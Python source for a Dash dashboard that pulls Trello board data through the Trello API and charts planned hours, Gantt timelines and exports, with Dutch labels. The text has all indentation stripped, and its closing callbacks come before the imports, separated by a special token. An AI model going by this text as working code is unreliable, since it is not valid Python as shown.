'width': 4}, showlegend=False))
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('ganttpersoon', 'figure'), [Input(
'dropdownganttpersoon', 'value'), Input('dropdownganttpersoonstatus',
'value')])
def update_ganttpersoon(v1, v2):
ganttdata = []
for i, j in data['kaarten'].items():
if j[config.get('Custom Field for Person')] == v1 and j['Status'
] != 'Archived' and j['Status'] in v2:
try:
ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
'Custom Field for Starting date')].date(), Finish=j[
config.get('Custom Field for Ending date')].date(),
Resource=j['Epic']))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource',
show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('ganttepics', 'figure'), [Input('dropdownganttepics',
'value')])
def update_ganttepics(value):
ganttdata = []
for i, j in data['kaarten'].items():
if j['Epic'] == value and j['Status'] != 'Archived':
try:
ganttdata.append(dict(Task=j['Naam'], Start=j[config.get(
'Custom Field for Starting date')].date(), Finish=j[
config.get('Custom Field for Ending date')].date(),
Resource=j['Status']))
except:
pass
if ganttdata != []:
fig = ff.create_gantt(ganttdata, index_col='Resource',
show_colorbar=True, showgrid_x=True, showgrid_y=True)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
return fig
else:
return {'data': [go.Pie()], 'layout': go.Layout(paper_bgcolor=
'rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)')}
@app.callback(Output('urenpermaand', 'figure'), [Input(
'dropdownurenpermaand', 'value')])
def update_urenpermaand(value):
layout = go.Layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)', xaxis={'title': 'Datum', 'gridcolor': 'gray'},
yaxis={'title': 'Ingeplande uren', 'gridcolor': 'gray'})
bars = []
if 'Regulier werk' in value:
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in
data['urenperdagperkaart'].values() if value[config.get(
'Custom Field for Categories')] == 'Regulier werk']), 0))
bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis, name=
'Regulier werk', line={'shape': 'spline', 'smoothing': 0.4},
mode='lines+markers', marker={'symbol': 'triangle-up-open',
'size': 10}, stackgroup='one'))
for categorie in data['arrays'][config.get('Custom Field for Categories')]:
if categorie in value and categorie != 'Regulier werk':
if categorie == None:
categorienaam = 'Geen categorie'
else:
categorienaam = categorie
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for
value in data['urenperdagperkaart'].values() if value[
config.get('Custom Field for Categories')] == categorie
]), 0))
bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,
name=categorienaam, line={'shape': 'spline', 'smoothing':
0.4}, mode='lines+markers', marker={'symbol':
'triangle-up-open', 'size': 10}, stackgroup='one'))
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in
data['beschikbareuren'].values()]), 0))
bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[
'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':
'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))
return {'data': bars, 'layout': layout}
@app.server.route('/dash/configuration/')
def download_file():
return flask.send_file('./configuration/configuration.txt',
attachment_filename='configuration.txt', as_attachment=True,
cache_timeout=0)
if __name__ == '__main__':
app.run_server(debug=False, host='0.0.0.0', port=8050)
<|reserved_special_token_1|>
import os, json, locale, requests, dash, dash_table, copy, time, flask, base64
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objects as go
import pandas as pd
from os import listdir
import plotly.figure_factory as ff
from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor
from dash.dependencies import Input, Output
from datetime import date, datetime, timedelta, time
from dateutil.relativedelta import relativedelta
try:
with open('./configuration/credentials.txt') as json_file:
credentials = json.load(json_file)
with open('./configuration/configuration.txt') as json_file:
config = json.load(json_file)
except:
raise Exception('Draai eerst deploy.py!')
locale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')
globals = {'config': config, 'credentials': credentials, 'styles': {}}
board_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +
credentials.get('API key') + '&token=' + credentials.get('API token'))
boards = json.loads(json.dumps(requests.get(board_url).json()))
globals['boards'] = boards
globals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',
'background-image': "url('./assets/left.png')", 'background-repeat':
'no-repeat', 'background-position': '0px 0px', 'margin-top': '1%',
'margin-bottom': '1%', 'margin-left': '1%', 'margin-right': '1%',
'text-align': 'center', 'border-radius': '10px'}
globals['styles']['tabs'] = {'border-style': 'solid', 'border-width': '2px',
'background': 'rgb(255,255,255)', 'background':
'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)'
, 'margin-top': '5px', 'margin-bottom': '5px', 'margin-right': '5px',
'margin-left': '5px', 'border-radius': '6px'}
globals['styles']['divgraphs'] = {'background-color':
'rgba(62,182,235,0.1)', 'margin-top': '1%', 'margin-bottom': '2%',
'margin-left': '1%', 'margin-right': '1%', 'text-align': 'center',
'border-radius': '10px'}
globals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}
globals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor
='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}
def get_data(value):
global data
global config
with open('./configuration/configuration.txt') as json_file:
configfile = json.load(json_file)
config = configfile.get(value)
keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(
'API token')
trello_base_url = 'https://api.trello.com/1/'
board_url = trello_base_url + 'boards/' + value
url_cards = (board_url +
'?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'
+ keys)
url_lists = board_url + '/lists?filter=all&' + keys
url_customfields = board_url + '/customFields?' + keys
url_labels = board_url + '/labels?' + keys
url_members = board_url + '/members?' + keys
board = json.loads(json.dumps(requests.get(url_cards).json()))
lists = json.loads(json.dumps(requests.get(url_lists).json()))
customfields = json.loads(json.dumps(requests.get(url_customfields).json())
)
labels = json.loads(json.dumps(requests.get(url_labels).json()))
members = json.loads(json.dumps(requests.get(url_members).json()))
cards = board['cards']
def dateCalc(date):
try:
newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')
return newdate
except:
return None
customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},
'checkbox': {}}
for i in customfields:
customfields_dict[i['type']] = {}
for i in customfields:
customfields_dict[i['type']][i['id']] = {}
for i in customfields:
if i['type'] == 'list':
customfields_dict[i['type']][i['id']]['name'] = i['name']
customfields_dict['list'][i['id']]['options'] = {}
for j in i['options']:
customfields_dict['list'][i['id']]['options'][j['id']] = j[
'value'].get('text')
else:
customfields_dict[i['type']][i['id']]['name'] = i['name']
chosenlists = []
for i in config.get('Not Started'):
chosenlists.append(i)
chosenlists.extend(config.get('Blocked'))
chosenlists.extend(config.get('Doing'))
chosenlists.extend(config.get('Done'))
for i in config.get('Epics'):
chosenlists.append(i)
for i in config.get('Always continuing'):
chosenlists.append(i)
for i in config.get('List with Epics Done'):
chosenlists.append(i)
def idtodate(cardid):
hex = cardid[0:8]
timestamp = int(hex, 16)
timedate = datetime.fromtimestamp(timestamp)
return timedate
def get_epicid(url):
try:
if 'epicId=' in url:
start = url.find('epicId=') + 7
end = url.find('&attachmentId=')
return url[start:end]
else:
pass
except:
pass
kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i
['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':
idtodate(i['id']), 'labels': [label['name'] for label in i['labels'
] if i['labels'] != []], 'members': [member['fullName'] for member in
members if member['id'] in i['idMembers']], 'Sjabloon': i[
'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i
['closed'], 'epicid': [get_epicid(j['url']) for j in i[
'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in
cards}
for i, j in kaarten.items():
while None in j['epicid']:
j['epicid'].remove(None)
if j['members'] != []:
j['Leden'] = ''
for k in j['members']:
if j['Leden'] == '':
j['Leden'] += k
else:
j['Leden'] += ', ' + k
else:
j['Leden'] = None
del j['members']
if customfields_dict != {}:
for i, j in customfields_dict.items():
for k, l in j.items():
for m, n in kaarten.items():
n[l['name']] = None
for i, j in kaarten.items():
for k in j['customfields']:
if k['idCustomField'] in customfields_dict['list'].keys():
j[customfields_dict['list'][k['idCustomField']].get('name')
] = customfields_dict['list'][k['idCustomField']][
'options'].get(k['idValue'])
elif k['idCustomField'] in customfields_dict['checkbox'].keys(
):
if k['value']['checked'] == 'true':
j[customfields_dict['checkbox'][k['idCustomField']]
.get('name')] = True
else:
j[customfields_dict['checkbox'][k['idCustomField']]
.get('name')] = False
elif k['idCustomField'] in customfields_dict['date'].keys():
j[customfields_dict['date'][k['idCustomField']].get('name')
] = dateCalc(k['value'].get('date'))
else:
for key in k['value']:
j[customfields_dict[key][k['idCustomField']].get(
'name')] = k['value'].get(key)
epicIdNameCategory = []
for i, j in kaarten.items():
epicIdNameCategory.append((i, j['Naam'], j[config.get(
'Custom Field for Categories')]))
for i, j in kaarten.items():
if j['epicid'] == []:
j['Epic'] = 'Geen epic'
j['Categorie'] = None
else:
for k in epicIdNameCategory:
if k[0] == j['epicid'][0]:
j['Epic'] = k[1]
j['Categorie'] = k[2]
del j['epicid']
for i, j in kaarten.items():
for k in lists:
if j['ListID'] == k['id']:
j['Lijst'] = k['name']
if j['Lijst'] in config.get('Not Started'):
j['Status'] = 'Niet gestart'
elif j['Lijst'] in config.get('Doing'):
j['Status'] = 'Doing'
elif j['Lijst'] in config.get('Blocked'):
j['Status'] = 'Blocked'
elif j['Lijst'] in config.get('Done'):
j['Status'] = 'Done'
elif j['Lijst'] in config.get('Always continuing'):
j['Status'] = 'Doorlopend'
elif j['Lijst'] in config.get('Epics'):
j['Status'] = 'Epics Doing'
elif j['Lijst'] in config.get('List with Epics Done'):
j['Status'] = 'Epics Done'
else:
j['Status'] = 'Archived'
del j['customfields']
del j['ListID']
for i, j in kaarten.items():
if j['Gearchiveerd'] == True and j['Status'] != 'Done':
j['Status'] = 'Archived'
liststodelete = []
for i in lists:
if i['name'] not in chosenlists:
liststodelete.append(i['name'])
cardstodelete = []
for i, j in kaarten.items():
if j['Sjabloon'] == True:
cardstodelete.append(i)
elif j['Lijst'] in liststodelete:
cardstodelete.append(i)
hours = {}
for i, j in kaarten.items():
if j['Lijst'] == config.get('List for hours'):
hours[j['Naam']] = {config['Custom Field for Starting date']: j
[config['Custom Field for Starting date']], config[
'Custom Field for Ending date']: j[config[
'Custom Field for Ending date']], config[
'Custom Field with hours']: j[config[
'Custom Field with hours']]}
for i in cardstodelete:
if i in kaarten:
del kaarten[i]
tmpdatesdict = {}
now = datetime.now().date()
numdays = 365
numdayshistory = 183
for x in range(0, numdays):
tmpdatesdict[str(now + timedelta(days=x))] = {}
for x in range(0, numdayshistory):
tmpdatesdict[str(now - timedelta(days=x))] = {}
dates = []
for i in sorted(tmpdatesdict):
dates.append(i)
arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten
.values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i
[5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(
i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(
[card['Status'] for card in kaarten.values()])), config.get(
'Custom Field for Categories'): list(dict.fromkeys([card[config.get
('Custom Field for Categories')] for card in kaarten.values()])),
config.get('Custom Field for Person'): list(dict.fromkeys([(card[
config.get('Custom Field for Person')] if card[config.get(
'Custom Field for Person')] != None else 'Geen ' + config.get(
'Custom Field for Person')) for card in kaarten.values()]))}
try:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
get('Custom Field for Starting date'): kaart[config.get(
'Custom Field for Starting date')], config.get(
'Custom Field for Ending date'): kaart[config.get(
'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],
config.get('Custom Field for Person'): kaart[config.get(
'Custom Field for Person')], config.get(
'Custom Field for Categories'): kaart[config.get(
'Custom Field for Categories')], config.get(
'Custom Field with hours'): kaart[config.get(
'Custom Field with hours')], 'Cognosrapport': kaart[
'Cognosrapport'], 'Niet meenemen in telling': kaart[
'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':
kaart['Status'], 'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for
kaart in kaarten.values()}
except:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
get('Custom Field for Starting date'): kaart[config.get(
'Custom Field for Starting date')], config.get(
'Custom Field for Ending date'): kaart[config.get(
'Custom Field for Ending date')], config.get(
'Custom Field for Person'): kaart[config.get(
'Custom Field for Person')], config.get(
'Custom Field for Categories'): kaart[config.get(
'Custom Field for Categories')], config.get(
'Custom Field with hours'): kaart[config.get(
'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':
kaart['Status'], 'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for
kaart in kaarten.values()}
beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in
hours.keys()}
for i in dates:
datekey = datetime.strptime(i, '%Y-%m-%d').date()
for k, l in kaarten.items():
if l['Niet meenemen in telling'] != True:
try:
if l[config.get('Custom Field for Starting date')].date(
) < datekey <= l[config.get(
'Custom Field for Ending date')].date():
delta = l[config.get('Custom Field for Ending date')
] - l[config.get('Custom Field for Starting date')]
hoursperday = int(l[config.get(
'Custom Field with hours')]) / int(delta.days)
urenperdagperkaart[l['Naam']]['urenperdag'][i
] = hoursperday
except:
pass
for k, l in hours.items():
try:
if l[config.get('Custom Field for Starting date')].date(
) < datekey <= l[config.get('Custom Field for Ending date')
].date():
hoursperday = int(l[config.get('Custom Field with hours')]
) / int(30.4)
beschikbareuren[k]['urenperdag'][i] = hoursperday
except:
pass
for i, j in urenperdagperkaart.items():
for k, l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m == k[0:4] + k[5:7]:
j['urenperperiode'][m] += l
for i, j in beschikbareuren.items():
for k, l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m == k[0:4] + k[5:7]:
j['urenperperiode'][m] += l
dfurenpermaand = copy.deepcopy(urenperdagperkaart)
for i, j in dfurenpermaand.items():
try:
j['Geplande uren'] = int(j['Geplande uren'])
except:
j['Geplande uren'] = 0
for k, l in j['urenperperiode'].items():
j[k] = round(l, 2)
del j['urenperperiode']
bars = []
labelsnietingepland = []
for j in kaarten.values():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
labelsnietingepland.append(j['Lijst'])
labelsnietingepland = list(dict.fromkeys(labelsnietingepland))
for i, j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
tmp = []
for label in labelsnietingepland:
if j['Lijst'] == label:
tmp.append(int(j['Geplande uren']))
else:
tmp.append(0)
bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],
type='bar', opacity='0.6'))
epicbars = []
tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in
kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}
tmpepicsforbarchart['Geen epic'] = 0
for i, j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
tmpepicsforbarchart[j['Epic']] += int(j[config.get(
'Custom Field with hours')])
epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}
epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[
value for value in epicsforbarchart.values()], type='bar', text=[
value for value in epicsforbarchart.values()], textposition=
'outside', opacity='0.6'))
thismonth = datetime.strftime(datetime.now(), '%Y%m')
nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')
twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')
arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,
'%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,
'%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,
'%Y%m').strftime('%B'))]
gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
thismonth]))
gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
nextmonth]))
gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
twomonths]))
deltathismonth = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == thismonth]))
deltanextmonth = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == nextmonth]))
deltatwomonths = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == twomonths]))
if deltathismonth > gaugegeplandthismonth:
gaugerangethismonth = deltathismonth + 20
else:
gaugerangethismonth = gaugegeplandthismonth + 20
if deltanextmonth > gaugegeplandnextmonth:
gaugerangenextmonth = deltanextmonth + 20
else:
gaugerangenextmonth = gaugegeplandnextmonth + 20
if deltatwomonths > gaugegeplandtwomonths:
gaugerangetwomonths = deltatwomonths + 20
else:
gaugerangetwomonths = gaugegeplandtwomonths + 20
gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *
0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5,
deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [
deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},
{'range': [deltathismonth * 0.9, deltathismonth], 'color':
'#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}
gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *
0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5,
deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [
deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},
{'range': [deltanextmonth * 0.9, deltanextmonth], 'color':
'#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}
gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *
0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5,
deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [
deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},
{'range': [deltatwomonths * 0.9, deltatwomonths], 'color':
'#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}
gaugefig = go.Figure()
gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},
value=gaugegeplandthismonth, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').
strftime('%B')}, delta={'reference': deltathismonth}, gauge=
gaugestepsthismonth))
gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},
value=gaugegeplandnextmonth, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').
strftime('%B')}, delta={'reference': deltanextmonth}, gauge=
gaugestepsnextmonth))
gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},
value=gaugegeplandtwomonths, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').
strftime('%B')}, delta={'reference': deltatwomonths}, gauge=
gaugestepstwomonths))
gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,
'gaugefig': gaugefig}
columntypes = {}
for key, value in kaarten[next(iter(kaarten))].items():
if 'datum' in key or key == 'Aangemaakt':
columntypes[key] = 'datetime'
elif type(value) == int:
columntypes[key] = 'numeric'
elif type(value in [str, bool]):
columntypes[key] = 'text'
columntypesurenpermaand = dict(columntypes)
columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})
data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':
urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':
graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,
'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=
dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}
def make_layout():
return html.Div(className='First Div', children=[html.Div(style={
'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',
'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',
'background':
'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'
, 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',
'margin-left': '1%', 'border-radius': '10px', 'text-align':
'center'}, className='Banner', children=[html.Div(style={'display':
'inline-block', 'width': '80%'}, children=[html.H1(
'Trello borden USD')]), html.Div(style={'display': 'inline-block',
'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(
'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]
), html.H5('Kies hieronder een bord', style={'text-align': 'center'
}), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],
'value': i['id']} for i in boards], value=boards[0]['id']), html.
Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div
(id='test')])
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
external_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets,
external_scripts=external_scripts, url_base_pathname='/dash/')
app.layout = make_layout
app.config['suppress_callback_exceptions'] = True
@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'
), Input('refreshdatabtn', 'n_clicks')])
def create_maindiv(value, n_clicks):
get_data(value)
import os
if os.name == 'nt':
daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')
else:
daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')
return html.Div(className='', children=[dcc.Markdown(
'**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',
children=[dcc.Tab(label='Gantt charts', style=globals['styles'][
'tabs'], children=[html.Div(className='tab2_div1', style=globals[
'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=
globals['styles']['divgraphs'], children=[dcc.Markdown(
'In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'
)])]), html.Div(className='tab2_div2', style=globals['styles'][
'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(
style=globals['styles']['dropdowns'], id='dropdownganttepics',
options=[{'label': name, 'value': name} for name in data['arrays'][
'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(
style=globals['styles']['divgraphs'], children=[dcc.Graph(id=
'ganttepics')])]), html.Div(className='tab2_div3', style=globals[
'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.
Dropdown(style=globals['styles']['dropdowns'], id=
'dropdownganttpersoon', options=[{'label': name, 'value': name} for
name in data['arrays'][config.get('Custom Field for Person')]]),
dcc.Dropdown(style=globals['styles']['dropdowns'], id=
'dropdownganttpersoonstatus', options=[{'label': name, 'value':
name} for name in data['arrays']['statuses']], value=data['arrays']
['statuses'], multi=True), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab
(label='Data export', style=globals['styles']['tabs'], children=[
html.Div(className='tab3_div1', style=globals['styles']['maindivs'],
children=[html.H3('Uitleg'), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Markdown(
"Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand."
), dcc.Markdown(
"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'."
)])]), html.Div(className='tab3_div2', style=globals['styles'][
'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(
'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),
dash_table.DataTable(id='table_plattedump', columns=[{'name': i,
'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable':
True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']
['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(
'records'), hidden_columns=[i for i in data['dfs']['columntypes']],
export_format='xlsx', export_headers='display', export_columns=
'all', filter_action='native', sort_action='native', sort_mode=
'multi', style_table={'overflowX': 'scroll'}, style_header={
'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={
'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),
html.Div(className='tab3_div3', style=globals['styles']['maindivs'],
children=[html.H4('Uren per maand'), dcc.Markdown(
'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'
), dcc.Markdown(
'Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'
), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':
i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),
'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in
data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][
'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data
['dfs']['columntypesurenpermaand']], export_format='xlsx',
export_headers='display', export_columns='all', filter_action=
'native', sort_action='native', sort_mode='multi', style_header={
'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={
'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=
'Langetermijnplanning', style=globals['styles']['tabs'], children=[
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H3('Uitleg'), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Markdown(
'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.
Markdown('De focus hierbij ligt vooral op de categorieen.')])]),
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(
style=globals['styles']['dropdowns'], id='dropdownurenpermaand',
options=[{'label': name, 'value': name} for name in data['arrays'][
config.get('Custom Field for Categories')] if name != None], multi=
True, searchable=False, value=data['arrays'][config.get(
'Custom Field for Categories')]), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(
className='tab1_div3', style=globals['styles']['maindivs'],
children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.
Markdown(
'*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'
), dcc.Markdown(
'*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'
), dcc.Markdown(
'*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.
Markdown(
'**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(id='graph_nietingepland', figure={'data': data['graphdata'][
'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),
html.Div(className='tab1_div4', style=globals['styles']['maindivs'],
children=[html.H4('Nog in te plannen uren (per epic)'), dcc.
Markdown(
'**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(id='graph_nietingepland_epics', figure={'data': data[
'graphdata']['nietingeplandepics'], 'layout': globals[
'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][
'tabs'], label='Tactische planning', children=[html.Div(className=
